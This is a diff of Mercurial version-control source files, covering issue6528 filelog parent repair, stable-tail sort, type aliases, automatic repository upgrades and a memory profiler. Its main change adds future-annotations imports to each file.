471 473 data_uncompressed_length=new_data_size,
472 474 data_delta_base=rev,
473 475 link_rev=link_rev,
474 476 parent_rev_1=p1,
475 477 parent_rev_2=p2,
476 478 node_id=entry[ENTRY_NODE_ID],
477 479 sidedata_offset=0,
478 480 sidedata_compressed_length=0,
479 481 data_compression_mode=COMP_MODE_PLAIN,
480 482 sidedata_compression_mode=COMP_MODE_PLAIN,
481 483 )
482 484 revlog.index.append(new_entry)
483 485 entry_bin = revlog.index.entry_binary(rev)
484 486 new_index_file.write(entry_bin)
485 487 revlog._docket.index_end = new_index_file.tell()
486 488 revlog._docket.data_end = new_data_file.tell()
487 489
488 490
489 491 def _get_filename_from_filelog_index(path):
490 492 # Drop the extension and the `data/` prefix
491 493 path_part = path.rsplit(b'.', 1)[0].split(b'/', 1)
492 494 if len(path_part) < 2:
493 495 msg = _(b"cannot recognize filelog from filename: '%s'")
494 496 msg %= path
495 497 raise error.Abort(msg)
496 498
497 499 return path_part[1]
498 500
499 501
500 502 def _filelog_from_filename(repo, path):
501 503 """Returns the filelog for the given `path`. Stolen from `engine.py`"""
502 504
503 505 from .. import filelog # avoid cycle
504 506
505 507 fl = filelog.filelog(repo.svfs, path)
506 508 return fl
507 509
508 510
509 511 def _write_swapped_parents(repo, rl, rev, offset, fp):
510 512 """Swaps p1 and p2 and overwrites the revlog entry for `rev` in `fp`"""
511 513 from ..pure import parsers # avoid cycle
512 514
513 515 if repo._currentlock(repo._lockref) is None:
514 516 # Let's be paranoid about it
515 517 msg = "repo needs to be locked to rewrite parents"
516 518 raise error.ProgrammingError(msg)
517 519
518 520 index_format = parsers.IndexObject.index_format
519 521 entry = rl.index[rev]
520 522 new_entry = list(entry)
521 523 new_entry[5], new_entry[6] = entry[6], entry[5]
522 524 packed = index_format.pack(*new_entry[:8])
523 525 fp.seek(offset)
524 526 fp.write(packed)
525 527
526 528
527 529 def _reorder_filelog_parents(repo, fl, to_fix):
528 530 """
529 531 Swaps p1 and p2 for all `to_fix` revisions of filelog `fl` and writes the
530 532 new version to disk, overwriting the old one with a rename.
531 533 """
532 534 from ..pure import parsers # avoid cycle
533 535
534 536 ui = repo.ui
535 537 assert len(to_fix) > 0
536 538 rl = fl._revlog
537 539 if rl._format_version != constants.REVLOGV1:
538 540 msg = "expected version 1 revlog, got version '%d'" % rl._format_version
539 541 raise error.ProgrammingError(msg)
540 542
541 543 index_file = rl._indexfile
542 544 new_file_path = index_file + b'.tmp-parents-fix'
543 545 repaired_msg = _(b"repaired revision %d of 'filelog %s'\n")
544 546
545 547 with ui.uninterruptible():
546 548 try:
547 549 util.copyfile(
548 550 rl.opener.join(index_file),
549 551 rl.opener.join(new_file_path),
550 552 checkambig=rl.data_config.check_ambig,
551 553 )
552 554
553 555 with rl.opener(new_file_path, mode=b"r+") as fp:
554 556 if rl._inline:
555 557 index = parsers.InlinedIndexObject(fp.read())
556 558 for rev in fl.revs():
557 559 if rev in to_fix:
558 560 offset = index._calculate_index(rev)
559 561 _write_swapped_parents(repo, rl, rev, offset, fp)
560 562 ui.write(repaired_msg % (rev, index_file))
561 563 else:
562 564 index_format = parsers.IndexObject.index_format
563 565 for rev in to_fix:
564 566 offset = rev * index_format.size
565 567 _write_swapped_parents(repo, rl, rev, offset, fp)
566 568 ui.write(repaired_msg % (rev, index_file))
567 569
568 570 rl.opener.rename(new_file_path, index_file)
569 571 rl.clearcaches()
570 572 rl._loadindex()
571 573 finally:
572 574 util.tryunlink(new_file_path)
573 575
574 576
575 577 def _is_revision_affected(fl, filerev, metadata_cache=None):
576 578 full_text = lambda: fl._revlog.rawdata(filerev)
577 579 parent_revs = lambda: fl._revlog.parentrevs(filerev)
578 580 return _is_revision_affected_inner(
579 581 full_text, parent_revs, filerev, metadata_cache
580 582 )
581 583
582 584
583 585 def _is_revision_affected_inner(
584 586 full_text,
585 587 parents_revs,
586 588 filerev,
587 589 metadata_cache=None,
588 590 ):
589 591 """Mercurial currently (5.9rc0) uses `p1 == nullrev and p2 != nullrev` as a
590 592 special meaning compared to the reverse in the context of filelog-based
591 593 copytracing. issue6528 exists because new code assumed that parent ordering
592 594 didn't matter, so this detects if the revision contains metadata (since
593 595 it's only used for filelog-based copytracing) and its parents are in the
594 596 "wrong" order."""
595 597 try:
596 598 raw_text = full_text()
597 599 except error.CensoredNodeError:
598 600 # We don't care about censored nodes as they never carry metadata
599 601 return False
600 602
601 603 # raw text can be a `memoryview`, which doesn't implement `startswith`
602 604 has_meta = bytes(raw_text[:2]) == b'\x01\n'
603 605 if metadata_cache is not None:
604 606 metadata_cache[filerev] = has_meta
605 607 if has_meta:
606 608 (p1, p2) = parents_revs()
607 609 if p1 != nullrev and p2 == nullrev:
608 610 return True
609 611 return False
610 612
611 613
612 614 def _is_revision_affected_fast(repo, fl, filerev, metadata_cache):
613 615 rl = fl._revlog
614 616 is_censored = lambda: rl.iscensored(filerev)
615 617 delta_base = lambda: rl.deltaparent(filerev)
616 618 delta = lambda: rl._chunk(filerev)
617 619 full_text = lambda: rl.rawdata(filerev)
618 620 parent_revs = lambda: rl.parentrevs(filerev)
619 621 return _is_revision_affected_fast_inner(
620 622 is_censored,
621 623 delta_base,
622 624 delta,
623 625 full_text,
624 626 parent_revs,
625 627 filerev,
626 628 metadata_cache,
627 629 )
628 630
629 631
630 632 def _is_revision_affected_fast_inner(
631 633 is_censored,
632 634 delta_base,
633 635 delta,
634 636 full_text,
635 637 parent_revs,
636 638 filerev,
637 639 metadata_cache,
638 640 ):
639 641 """Optimization fast-path for `_is_revision_affected`.
640 642
641 643 `metadata_cache` is a dict of `{rev: has_metadata}` which allows any
642 644 revision to check if its base has metadata, saving computation of the full
643 645 text, instead looking at the current delta.
644 646
645 647 This optimization only works if the revisions are looked at in order."""
646 648
647 649 if is_censored():
648 650 # Censored revisions don't contain metadata, so they cannot be affected
649 651 metadata_cache[filerev] = False
650 652 return False
651 653
652 654 p1, p2 = parent_revs()
653 655 if p1 == nullrev or p2 != nullrev:
654 656 return False
655 657
656 658 delta_parent = delta_base()
657 659 parent_has_metadata = metadata_cache.get(delta_parent)
658 660 if parent_has_metadata is None:
659 661 return _is_revision_affected_inner(
660 662 full_text,
661 663 parent_revs,
662 664 filerev,
663 665 metadata_cache,
664 666 )
665 667
666 668 chunk = delta()
667 669 if not len(chunk):
668 670 # No diff for this revision
669 671 return parent_has_metadata
670 672
671 673 header_length = 12
672 674 if len(chunk) < header_length:
673 675 raise error.Abort(_(b"patch cannot be decoded"))
674 676
675 677 start, _end, _length = struct.unpack(b">lll", chunk[:header_length])
676 678
677 679 if start < 2: # len(b'\x01\n') == 2
678 680 # This delta does *something* to the metadata marker (if any).
679 681 # Check it the slow way
680 682 is_affected = _is_revision_affected_inner(
681 683 full_text,
682 684 parent_revs,
683 685 filerev,
684 686 metadata_cache,
685 687 )
686 688 return is_affected
687 689
688 690 # The diff did not remove or add the metadata header, it's then in the same
689 691 # situation as its parent
690 692 metadata_cache[filerev] = parent_has_metadata
691 693 return parent_has_metadata
692 694
693 695
694 696 def _from_report(ui, repo, context, from_report, dry_run):
695 697 """
696 698 Fix the revisions given in the `from_report` file, but still checks if the
697 699 revisions are indeed affected to prevent an unfortunate cyclic situation
698 700 where we'd swap well-ordered parents again.
699 701
700 702 See the doc for `debug_fix_issue6528` for the format documentation.
701 703 """
702 704 ui.write(_(b"loading report file '%s'\n") % from_report)
703 705
704 706 with context(), open(from_report, mode='rb') as f:
705 707 for line in f.read().split(b'\n'):
706 708 if not line:
707 709 continue
708 710 filenodes, filename = line.split(b' ', 1)
709 711 fl = _filelog_from_filename(repo, filename)
710 712 to_fix = set(
711 713 fl.rev(binascii.unhexlify(n)) for n in filenodes.split(b',')
712 714 )
713 715 excluded = set()
714 716
715 717 for filerev in to_fix:
716 718 if _is_revision_affected(fl, filerev):
717 719 msg = b"found affected revision %d for filelog '%s'\n"
718 720 ui.warn(msg % (filerev, filename))
719 721 else:
720 722 msg = _(b"revision %s of file '%s' is not affected\n")
721 723 msg %= (binascii.hexlify(fl.node(filerev)), filename)
722 724 ui.warn(msg)
723 725 excluded.add(filerev)
724 726
725 727 to_fix = to_fix - excluded
726 728 if not to_fix:
727 729 msg = _(b"no affected revisions were found for '%s'\n")
728 730 ui.write(msg % filename)
729 731 continue
730 732 if not dry_run:
731 733 _reorder_filelog_parents(repo, fl, sorted(to_fix))
732 734
733 735
734 736 def filter_delta_issue6528(revlog, deltas_iter):
735 737 """filter incomind deltas to repaire issue 6528 on the fly"""
736 738 metadata_cache = {}
737 739
738 740 deltacomputer = deltas.deltacomputer(revlog)
739 741
740 742 for rev, d in enumerate(deltas_iter, len(revlog)):
741 743 (
742 744 node,
743 745 p1_node,
744 746 p2_node,
745 747 linknode,
746 748 deltabase,
747 749 delta,
748 750 flags,
749 751 sidedata,
750 752 ) = d
751 753
752 754 if not revlog.index.has_node(deltabase):
753 755 raise error.LookupError(
754 756 deltabase, revlog.radix, _(b'unknown parent')
755 757 )
756 758 base_rev = revlog.rev(deltabase)
757 759 if not revlog.index.has_node(p1_node):
758 760 raise error.LookupError(p1_node, revlog.radix, _(b'unknown parent'))
759 761 p1_rev = revlog.rev(p1_node)
760 762 if not revlog.index.has_node(p2_node):
761 763 raise error.LookupError(p2_node, revlog.radix, _(b'unknown parent'))
762 764 p2_rev = revlog.rev(p2_node)
763 765
764 766 is_censored = lambda: bool(flags & REVIDX_ISCENSORED)
765 767 delta_base = lambda: revlog.rev(delta_base)
766 768 delta_base = lambda: base_rev
767 769 parent_revs = lambda: (p1_rev, p2_rev)
768 770
769 771 def full_text():
770 772 # note: being able to reuse the full text computation in the
771 773 # underlying addrevision would be useful however this is a bit too
772 774 # intrusive the for the "quick" issue6528 we are writing before the
773 775 # 5.8 release
774 776 textlen = mdiff.patchedsize(revlog.size(base_rev), delta)
775 777
776 778 revinfo = revlogutils.revisioninfo(
777 779 node,
778 780 p1_node,
779 781 p2_node,
780 782 [None],
781 783 textlen,
782 784 (base_rev, delta),
783 785 flags,
784 786 )
785 787 return deltacomputer.buildtext(revinfo)
786 788
787 789 is_affected = _is_revision_affected_fast_inner(
788 790 is_censored,
789 791 delta_base,
790 792 lambda: delta,
791 793 full_text,
792 794 parent_revs,
793 795 rev,
794 796 metadata_cache,
795 797 )
796 798 if is_affected:
797 799 d = (
798 800 node,
799 801 p2_node,
800 802 p1_node,
801 803 linknode,
802 804 deltabase,
803 805 delta,
804 806 flags,
805 807 sidedata,
806 808 )
807 809 yield d
808 810
809 811
810 812 def repair_issue6528(
811 813 ui, repo, dry_run=False, to_report=None, from_report=None, paranoid=False
812 814 ):
813 815 @contextlib.contextmanager
814 816 def context():
815 817 if dry_run or to_report: # No need for locking
816 818 yield
817 819 else:
818 820 with repo.wlock(), repo.lock():
819 821 yield
820 822
821 823 if from_report:
822 824 return _from_report(ui, repo, context, from_report, dry_run)
823 825
824 826 report_entries = []
825 827
826 828 with context():
827 829 files = list(
828 830 entry
829 831 for entry in repo.store.data_entries()
830 832 if entry.is_revlog and entry.is_filelog
831 833 )
832 834
833 835 progress = ui.makeprogress(
834 836 _(b"looking for affected revisions"),
835 837 unit=_(b"filelogs"),
836 838 total=len(files),
837 839 )
838 840 found_nothing = True
839 841
840 842 for entry in files:
841 843 progress.increment()
842 844 filename = entry.target_id
843 845 fl = _filelog_from_filename(repo, entry.target_id)
844 846
845 847 # Set of filerevs (or hex filenodes if `to_report`) that need fixing
846 848 to_fix = set()
847 849 metadata_cache = {}
848 850 for filerev in fl.revs():
849 851 affected = _is_revision_affected_fast(
850 852 repo, fl, filerev, metadata_cache
851 853 )
852 854 if paranoid:
853 855 slow = _is_revision_affected(fl, filerev)
854 856 if slow != affected:
855 857 msg = _(b"paranoid check failed for '%s' at node %s")
856 858 node = binascii.hexlify(fl.node(filerev))
857 859 raise error.Abort(msg % (filename, node))
858 860 if affected:
859 861 msg = b"found affected revision %d for file '%s'\n"
860 862 ui.warn(msg % (filerev, filename))
861 863 found_nothing = False
862 864 if not dry_run:
863 865 if to_report:
864 866 to_fix.add(binascii.hexlify(fl.node(filerev)))
865 867 else:
866 868 to_fix.add(filerev)
867 869
868 870 if to_fix:
869 871 to_fix = sorted(to_fix)
870 872 if to_report:
871 873 report_entries.append((filename, to_fix))
872 874 else:
873 875 _reorder_filelog_parents(repo, fl, to_fix)
874 876
875 877 if found_nothing:
876 878 ui.write(_(b"no affected revisions were found\n"))
877 879
878 880 if to_report and report_entries:
879 881 with open(to_report, mode="wb") as f:
880 882 for path, to_fix in report_entries:
881 883 f.write(b"%s %s\n" % (b",".join(to_fix), path))
882 884
883 885 progress.complete()
@@ -1,172 +1,174
1 1 # stabletailsort.py - stable ordering of revisions
2 2 #
3 3 # Copyright 2021-2023 Pacien TRAN-GIRARD <pacien.trangirard@pacien.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 """
9 9 Stable-tail sort computation.
10 10
11 11 The "stable-tail sort", or STS, is a reverse topological ordering of the
12 12 ancestors of a node, which tends to share large suffixes with the stable-tail
13 13 sort of ancestors and other nodes, giving it its name.
14 14
15 15 Its properties should make it suitable for making chunks of ancestors with high
16 16 reuse and incrementality for example.
17 17
18 18 This module and implementation are experimental. Most functions are not yet
19 19 optimised to operate on large production graphs.
20 20 """
21 21
22 from __future__ import annotations
23
22 24 import itertools
23 25 from ..node import nullrev
24 26 from .. import ancestor
25 27
26 28
27 29 def _sorted_parents(cl, p1, p2):
28 30 """
29 31 Chooses and returns the pair (px, pt) from (p1, p2).
30 32
31 33 Where
32 34 "px" denotes the parent starting the "exclusive" part, and
33 35 "pt" denotes the parent starting the "Tail" part.
34 36
35 37 "px" is chosen as the parent with the lowest rank with the goal of
36 38 minimising the size of the exclusive part and maximise the size of the
37 39 tail part, hopefully reducing the overall complexity of the stable-tail
38 40 sort.
39 41
40 42 In case of equal ranks, the stable node ID is used as a tie-breaker.
41 43 """
42 44 r1, r2 = cl.fast_rank(p1), cl.fast_rank(p2)
43 45 if r1 < r2:
44 46 return (p1, p2)
45 47 elif r1 > r2:
46 48 return (p2, p1)
47 49 elif cl.node(p1) < cl.node(p2):
48 50 return (p1, p2)
49 51 else:
50 52 return (p2, p1)
51 53
52 54
53 55 def _nonoedipal_parent_revs(cl, rev):
54 56 """
55 57 Returns the non-Ε“dipal parent pair of the given revision.
56 58
57 59 An Ε“dipal merge is a merge with parents p1, p2 with either
58 60 p1 in ancestors(p2) or p2 in ancestors(p1).
59 61 In the first case, p1 is the Ε“dipal parent.
60 62 In the second case, p2 is the Ε“dipal parent.
61 63
62 64 Ε’dipal edges start empty exclusive parts. They do not bring new ancestors.
63 65 As such, they can be skipped when computing any topological sort or any
64 66 iteration over the ancestors of a node.
65 67
66 68 The Ε“dipal edges are eliminated here using the rank information.
67 69 """
68 70 p1, p2 = cl.parentrevs(rev)
69 71 if p1 == nullrev or cl.fast_rank(p2) == cl.fast_rank(rev) - 1:
70 72 return p2, nullrev
71 73 elif p2 == nullrev or cl.fast_rank(p1) == cl.fast_rank(rev) - 1:
72 74 return p1, nullrev
73 75 else:
74 76 return p1, p2
75 77
76 78
77 79 def _parents(cl, rev):
78 80 p1, p2 = _nonoedipal_parent_revs(cl, rev)
79 81 if p2 == nullrev:
80 82 return p1, p2
81 83
82 84 return _sorted_parents(cl, p1, p2)
83 85
84 86
85 87 def _stable_tail_sort_naive(cl, head_rev):
86 88 """
87 89 Naive topological iterator of the ancestors given by the stable-tail sort.
88 90
89 91 The stable-tail sort of a node "h" is defined as the sequence:
90 92 sts(h) := [h] + excl(h) + sts(pt(h))
91 93 where excl(h) := u for u in sts(px(h)) if u not in ancestors(pt(h))
92 94
93 95 This implementation uses a call-stack whose size is
94 96 O(number of open merges).
95 97
96 98 As such, this implementation exists mainly as a defining reference.
97 99 """
98 100 cursor_rev = head_rev
99 101 while cursor_rev != nullrev:
100 102 yield cursor_rev
101 103
102 104 px, pt = _parents(cl, cursor_rev)
103 105 if pt == nullrev:
104 106 cursor_rev = px
105 107 else:
106 108 tail_ancestors = ancestor.lazyancestors(
107 109 cl.parentrevs, (pt,), inclusive=True
108 110 )
109 111 exclusive_ancestors = (
110 112 a
111 113 for a in _stable_tail_sort_naive(cl, px)
112 114 if a not in tail_ancestors
113 115 )
114 116
115 117 # Notice that excl(cur) is disjoint from ancestors(pt),
116 118 # so there is no double-counting:
117 119 # rank(cur) = len([cur]) + len(excl(cur)) + rank(pt)
118 120 excl_part_size = cl.fast_rank(cursor_rev) - cl.fast_rank(pt) - 1
119 121 yield from itertools.islice(exclusive_ancestors, excl_part_size)
120 122 cursor_rev = pt
121 123
122 124
123 125 def _find_all_leaps_naive(cl, head_rev):
124 126 """
125 127 Yields the leaps in the stable-tail sort of the given revision.
126 128
127 129 A leap is a pair of revisions (source, target) consecutive in the
128 130 stable-tail sort of a head, for which target != px(source).
129 131
130 132 Leaps are yielded in the same order as encountered in the stable-tail sort,
131 133 from head to root.
132 134 """
133 135 sts = _stable_tail_sort_naive(cl, head_rev)
134 136 prev = next(sts)
135 137 for current in sts:
136 138 if current != _parents(cl, prev)[0]:
137 139 yield (prev, current)
138 140
139 141 prev = current
140 142
141 143
142 144 def _find_specific_leaps_naive(cl, head_rev):
143 145 """
144 146 Returns the specific leaps in the stable-tail sort of the given revision.
145 147
146 148 Specific leaps are leaps appear in the stable-tail sort of a given
147 149 revision, but not in the stable-tail sort of any of its ancestors.
148 150
149 151 The final leaps (leading to the pt of the considered merge) are omitted.
150 152
151 153 Only merge nodes can have associated specific leaps.
152 154
153 155 This implementations uses the whole leap sets of the given revision and
154 156 of its parents.
155 157 """
156 158 px, pt = _parents(cl, head_rev)
157 159 if px == nullrev or pt == nullrev:
158 160 return # linear nodes cannot have specific leaps
159 161
160 162 parents_leaps = set(_find_all_leaps_naive(cl, px))
161 163
162 164 sts = _stable_tail_sort_naive(cl, head_rev)
163 165 prev = next(sts)
164 166 for current in sts:
165 167 if current == pt:
166 168 break
167 169 if current != _parents(cl, prev)[0]:
168 170 leap = (prev, current)
169 171 if leap not in parents_leaps:
170 172 yield leap
171 173
172 174 prev = current
@@ -1,48 +1,50
1 1 # typelib.py - type hint aliases and support
2 2 #
3 3 # Copyright 2022 Matt Harbison <matt_harbison@yahoo.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 from __future__ import annotations
9
8 10 import typing
9 11
10 12 from typing import (
11 13 Callable,
12 14 )
13 15
14 16 # Note: this is slightly different from pycompat.TYPE_CHECKING, as using
15 17 # pycompat causes the BinaryIO_Proxy type to be resolved to ``object`` when
16 18 # used as the base class during a pytype run.
17 19 TYPE_CHECKING = typing.TYPE_CHECKING
18 20
19 21
20 22 # The BinaryIO class provides empty methods, which at runtime means that
21 23 # ``__getattr__`` on the proxy classes won't get called for the methods that
22 24 # should delegate to the internal object. So to avoid runtime changes because
23 25 # of the required typing inheritance, just use BinaryIO when typechecking, and
24 26 # ``object`` otherwise.
25 27 if TYPE_CHECKING:
26 28 from typing import (
27 29 BinaryIO,
28 30 Union,
29 31 )
30 32
31 33 from . import (
32 34 node,
33 35 posix,
34 36 windows,
35 37 )
36 38
37 39 BinaryIO_Proxy = BinaryIO
38 40 CacheStat = Union[posix.cachestat, windows.cachestat]
39 41 NodeConstants = node.sha1nodeconstants
40 42 else:
41 43 from typing import Any
42 44
43 45 BinaryIO_Proxy = object
44 46 CacheStat = Any
45 47 NodeConstants = Any
46 48
47 49 # scmutil.getuipathfn() related callback.
48 50 UiPathFn = Callable[[bytes], bytes]
@@ -1,254 +1,257
1 1 # upgrade.py - functions for automatic upgrade of Mercurial repository
2 2 #
3 3 # Copyright (c) 2022-present, Pierre-Yves David
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7
8 from __future__ import annotations
9
7 10 from ..i18n import _
8 11
9 12 from .. import (
10 13 error,
11 14 requirements as requirementsmod,
12 15 scmutil,
13 16 )
14 17
15 18 from . import (
16 19 actions,
17 20 engine,
18 21 )
19 22
20 23
21 24 class AutoUpgradeOperation(actions.BaseOperation):
22 25 """A limited Upgrade Operation used to run simple auto upgrade task
23 26
24 27 (Expand it as needed in the future)
25 28 """
26 29
27 30 def __init__(self, req):
28 31 super().__init__(
29 32 new_requirements=req,
30 33 backup_store=False,
31 34 )
32 35
33 36
34 37 def get_share_safe_action(repo):
35 38 """return an automatic-upgrade action for `share-safe` if applicable
36 39
37 40 If no action is needed, return None, otherwise return a callback to upgrade
38 41 or downgrade the repository according the configuration and repository
39 42 format.
40 43 """
41 44 ui = repo.ui
42 45 requirements = repo.requirements
43 46 auto_upgrade_share_source = ui.configbool(
44 47 b'format',
45 48 b'use-share-safe.automatic-upgrade-of-mismatching-repositories',
46 49 )
47 50 auto_upgrade_quiet = ui.configbool(
48 51 b'format',
49 52 b'use-share-safe.automatic-upgrade-of-mismatching-repositories:quiet',
50 53 )
51 54
52 55 action = None
53 56
54 57 if (
55 58 auto_upgrade_share_source
56 59 and requirementsmod.SHARED_REQUIREMENT not in requirements
57 60 ):
58 61 sf_config = ui.configbool(b'format', b'use-share-safe')
59 62 sf_local = requirementsmod.SHARESAFE_REQUIREMENT in requirements
60 63 if sf_config and not sf_local:
61 64 msg = _(
62 65 b"automatically upgrading repository to the `share-safe`"
63 66 b" feature\n"
64 67 )
65 68 hint = b"(see `hg help config.format.use-share-safe` for details)\n"
66 69
67 70 def action():
68 71 if not (ui.quiet or auto_upgrade_quiet):
69 72 ui.write_err(msg)
70 73 ui.write_err(hint)
71 74 requirements.add(requirementsmod.SHARESAFE_REQUIREMENT)
72 75 scmutil.writereporequirements(repo, requirements)
73 76
74 77 elif sf_local and not sf_config:
75 78 msg = _(
76 79 b"automatically downgrading repository from the `share-safe`"
77 80 b" feature\n"
78 81 )
79 82 hint = b"(see `hg help config.format.use-share-safe` for details)\n"
80 83
81 84 def action():
82 85 if not (ui.quiet or auto_upgrade_quiet):
83 86 ui.write_err(msg)
84 87 ui.write_err(hint)
85 88 requirements.discard(requirementsmod.SHARESAFE_REQUIREMENT)
86 89 scmutil.writereporequirements(repo, requirements)
87 90
88 91 return action
89 92
90 93
91 94 def get_tracked_hint_action(repo):
92 95 """return an automatic-upgrade action for `tracked-hint` if applicable
93 96
94 97 If no action is needed, return None, otherwise return a callback to upgrade
95 98 or downgrade the repository according the configuration and repository
96 99 format.
97 100 """
98 101 ui = repo.ui
99 102 requirements = set(repo.requirements)
100 103 auto_upgrade_tracked_hint = ui.configbool(
101 104 b'format',
102 105 b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories',
103 106 )
104 107 auto_upgrade_quiet = ui.configbool(
105 108 b'format',
106 109 b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories:quiet',
107 110 )
108 111
109 112 action = None
110 113
111 114 if auto_upgrade_tracked_hint:
112 115 th_config = ui.configbool(b'format', b'use-dirstate-tracked-hint')
113 116 th_local = requirementsmod.DIRSTATE_TRACKED_HINT_V1 in requirements
114 117 if th_config and not th_local:
115 118 msg = _(
116 119 b"automatically upgrading repository to the `tracked-hint`"
117 120 b" feature\n"
118 121 )
119 122 hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n"
120 123
121 124 def action():
122 125 if not (ui.quiet or auto_upgrade_quiet):
123 126 ui.write_err(msg)
124 127 ui.write_err(hint)
125 128 requirements.add(requirementsmod.DIRSTATE_TRACKED_HINT_V1)
126 129 op = AutoUpgradeOperation(requirements)
127 130 engine.upgrade_tracked_hint(ui, repo, op, add=True)
128 131
129 132 elif th_local and not th_config:
130 133 msg = _(
131 134 b"automatically downgrading repository from the `tracked-hint`"
132 135 b" feature\n"
133 136 )
134 137 hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n"
135 138
136 139 def action():
137 140 if not (ui.quiet or auto_upgrade_quiet):
138 141 ui.write_err(msg)
139 142 ui.write_err(hint)
140 143 requirements.discard(requirementsmod.DIRSTATE_TRACKED_HINT_V1)
141 144 op = AutoUpgradeOperation(requirements)
142 145 engine.upgrade_tracked_hint(ui, repo, op, add=False)
143 146
144 147 return action
145 148
146 149
147 150 def get_dirstate_v2_action(repo):
148 151 """return an automatic-upgrade action for `dirstate-v2` if applicable
149 152
150 153 If no action is needed, return None, otherwise return a callback to upgrade
151 154 or downgrade the repository according the configuration and repository
152 155 format.
153 156 """
154 157 ui = repo.ui
155 158 requirements = set(repo.requirements)
156 159 auto_upgrade_dv2 = ui.configbool(
157 160 b'format',
158 161 b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories',
159 162 )
160 163 auto_upgrade_dv2_quiet = ui.configbool(
161 164 b'format',
162 165 b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories:quiet',
163 166 )
164 167
165 168 action = None
166 169
167 170 if auto_upgrade_dv2:
168 171 d2_config = ui.configbool(b'format', b'use-dirstate-v2')
169 172 d2_local = requirementsmod.DIRSTATE_V2_REQUIREMENT in requirements
170 173 if d2_config and not d2_local:
171 174 msg = _(
172 175 b"automatically upgrading repository to the `dirstate-v2`"
173 176 b" feature\n"
174 177 )
175 178 hint = (
176 179 b"(see `hg help config.format.use-dirstate-v2` for details)\n"
177 180 )
178 181
179 182 def action():
180 183 if not (ui.quiet or auto_upgrade_dv2_quiet):
181 184 ui.write_err(msg)
182 185 ui.write_err(hint)
183 186 requirements.add(requirementsmod.DIRSTATE_V2_REQUIREMENT)
184 187 fake_op = AutoUpgradeOperation(requirements)
185 188 engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v1', b'v2')
186 189
187 190 elif d2_local and not d2_config:
188 191 msg = _(
189 192 b"automatically downgrading repository from the `dirstate-v2`"
190 193 b" feature\n"
191 194 )
192 195 hint = (
193 196 b"(see `hg help config.format.use-dirstate-v2` for details)\n"
194 197 )
195 198
196 199 def action():
197 200 if not (ui.quiet or auto_upgrade_dv2_quiet):
198 201 ui.write_err(msg)
199 202 ui.write_err(hint)
200 203 requirements.discard(requirementsmod.DIRSTATE_V2_REQUIREMENT)
201 204 fake_op = AutoUpgradeOperation(requirements)
202 205 engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v2', b'v1')
203 206
204 207 return action
205 208
206 209
207 210 AUTO_UPGRADE_ACTIONS = [
208 211 get_dirstate_v2_action,
209 212 get_share_safe_action,
210 213 get_tracked_hint_action,
211 214 ]
212 215
213 216
214 217 def may_auto_upgrade(repo, maker_func):
215 218 """potentially perform auto-upgrade and return the final repository to use
216 219
217 220 Auto-upgrade are "quick" repository upgrade that might automatically be run
218 221 by "any" repository access. See `hg help config.format` for automatic
219 222 upgrade documentation.
220 223
221 224 note: each relevant upgrades are done one after the other for simplicity.
222 225 This avoid having repository is partially inconsistent state while
223 226 upgrading.
224 227
225 228 repo: the current repository instance
226 229 maker_func: a factory function that can recreate a repository after an upgrade
227 230 """
228 231 clear = False
229 232
230 233 loop = 0
231 234
232 235 try:
233 236 while not clear:
234 237 loop += 1
235 238 if loop > 100:
236 239 # XXX basic protection against infinite loop, make it better.
237 240 raise error.ProgrammingError("Too many auto upgrade loops")
238 241 clear = True
239 242 for get_action in AUTO_UPGRADE_ACTIONS:
240 243 action = get_action(repo)
241 244 if action is not None:
242 245 clear = False
243 246 with repo.wlock(wait=False), repo.lock(wait=False):
244 247 action = get_action(repo)
245 248 if action is not None:
246 249 action()
247 250 repo = maker_func()
248 251 except error.LockError:
249 252 # if we cannot get the lock, ignore the auto-upgrade attemps and
250 253 # proceed. We might want to make this behavior configurable in the
251 254 # future.
252 255 pass
253 256
254 257 return repo
@@ -1,44 +1,46
1 1 # memorytop requires Python 3.4
2 2 #
3 3 # Usage: set PYTHONTRACEMALLOC=n in the environment of the hg invocation,
4 4 # where n>= is the number of frames to show in the backtrace. Put calls to
5 5 # memorytop in strategic places to show the current memory use by allocation
6 6 # site.
7 7
8 from __future__ import annotations
9
8 10 import gc
9 11 import tracemalloc
10 12
11 13
12 14 def memorytop(limit=10):
13 15 gc.collect()
14 16 snapshot = tracemalloc.take_snapshot()
15 17
16 18 snapshot = snapshot.filter_traces(
17 19 (
18 20 tracemalloc.Filter(False, "<frozen importlib._bootstrap>"),
19 21 tracemalloc.Filter(False, "<frozen importlib._bootstrap_external>"),
20 22 tracemalloc.Filter(False, "<unknown>"),
21 23 )
22 24 )
23 25 stats = snapshot.statistics('traceback')
24 26
25 27 total = sum(stat.size for stat in stats)
26 28 print("\nTotal allocated size: %.1f KiB\n" % (total / 1024))
27 29 print("Lines with the biggest net allocations")
28 30 for index, stat in enumerate(stats[:limit], 1):
29 31 print(
30 32 "#%d: %d objects using %.1f KiB"
31 33 % (index, stat.count, stat.size / 1024)
32 34 )
33 35 for line in stat.traceback.format(most_recent_first=True):
34 36 print(' ', line)
35 37
36 38 other = stats[limit:]
37 39 if other:
38 40 size = sum(stat.size for stat in other)
39 41 count = sum(stat.count for stat in other)
40 42 print(
41 43 "%s other: %d objects using %.1f KiB"
42 44 % (len(other), count, size / 1024)
43 45 )
44 46 print()
@@ -1,971 +1,974
1 1 # utils.urlutil - code related to [paths] management
2 2 #
3 3 # Copyright 2005-2023 Olivia Mackall <olivia@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7
8 from __future__ import annotations
9
7 10 import os
8 11 import re as remod
9 12 import socket
10 13
11 14 from typing import (
12 15 Callable,
13 16 Dict,
14 17 Tuple,
15 18 Union,
16 19 )
17 20
18 21 from ..i18n import _
19 22 from .. import (
20 23 encoding,
21 24 error,
22 25 pycompat,
23 26 urllibcompat,
24 27 )
25 28
26 29 from . import (
27 30 stringutil,
